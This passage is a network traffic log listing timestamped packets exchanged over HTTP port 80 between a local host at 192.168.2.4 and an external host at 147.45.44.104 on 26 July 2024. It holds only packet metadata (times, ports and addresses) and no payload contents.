Jul 26, 2024 18:56:40.716866970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716876030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716885090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716897964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.716902971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.716919899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.716934919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.720653057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.720699072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.720717907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.720727921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.720782995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.720935106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.720943928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.720952988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.720964909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.720973969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.720988035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.721007109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.777668953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.777729988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.777823925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.777833939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.777862072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.777877092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.777913094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.777923107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.777928114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.777950048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.777966976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.778136015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.778172970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.785593987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.785634041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.785665035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.785675049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.785696030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.785708904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.785852909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.785862923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.785868883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.785873890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.785891056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.785907030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.786237001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.786247015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.786252022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.786257029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.786272049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.786274910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.786286116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.786295891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.786298037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.786309958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.786319017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.786319017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.786334038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.786356926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.787147045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.787157059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.787166119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.787177086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.787184954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.787185907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.787198067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.787208080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.787209034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.787220001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.787230968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.787231922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.787240982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.787251949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.787266016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.788048029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788058996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788063049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788068056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788086891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.788098097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788109064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.788110018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788122892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788134098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788135052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.788144112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788155079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788157940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.788182974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.788929939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788940907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788949966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788959026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788968086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788968086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.788980007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788990021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.788990974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.789000988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789011955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789014101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.789024115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789026976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.789047956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.789062023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.789874077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789884090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789894104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789901972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789905071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.789911985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.789913893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789926052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789932013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.789936066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789947033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789954901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789954901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.789966106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.789971113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.789994001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.790007114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.790846109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.790855885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.790865898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.790874958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.790883064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.790887117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.790896893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.790898085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.790909052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.790918112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.790920019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.790929079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.790935993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.790940046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.790950060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.790971994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.791834116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791848898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791858912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791867971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791876078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.791877985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791887999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791892052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.791899920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791909933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791913033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.791920900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791929007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.791932106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791940928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.791945934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.791964054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.792692900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792704105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792711973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792721033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792730093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792737961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.792738914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792752028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792757988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.792762995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792773008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792782068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792783976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.792793036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.792803049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.792815924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.792845011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.794018984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794028997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794033051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794038057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794047117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794056892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794064999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794070959 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.794076920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794085979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794095993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794096947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.794114113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.794126987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.794426918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794461012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.794490099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794500113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794509888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794517040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.794519901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.794529915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.794544935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.794559956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.936429977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.936456919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.936467886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.936517954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.936551094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.936614990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.936633110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.936645031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.936651945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.936659098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.936676979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.936697960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937055111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937064886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937076092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937086105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937097073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937098980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937109947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937114954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937122107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937134027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937139034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937145948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937166929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937191963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937853098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937863111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937872887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937882900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937894106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937906027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937906981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937920094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937922001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937932014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937938929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937946081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937951088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937957048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937968969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.937975883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.937999010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.938730955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.938741922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.938751936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.938765049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.938774109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.938779116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.938790083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.938791037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.938803911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.938815117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.938816071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.938827038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.938832998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.938851118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.938873053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.939753056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939764023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939774990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939785004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939798117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939800978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.939810038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939821959 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.939821959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939834118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939846039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939846992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.939853907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.939857960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939870119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.939881086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.939896107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.940473080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940495968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940507889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940517902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.940520048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940531969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940542936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940546036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.940552950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940563917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940570116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.940579891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940587997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.940589905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940603971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940613031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.940615892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.940639973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.940654993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.941399097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941409111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941418886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941428900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941442966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.941442966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941456079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941466093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941466093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.941478968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941483974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.941490889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941500902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941509008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.941513062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.941534996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.941550016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.942389011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942400932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942409992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942420959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942431927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942437887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.942444086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942456007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942457914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.942467928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942471981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.942478895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942492008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942492962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.942502975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.942507029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.942524910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.942544937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.943288088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.943299055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.943310022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.943320990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.943330050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.943331003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.943344116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.943351984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.943356037 CEST	80	49757	147.45.44.104	192.168.2.4
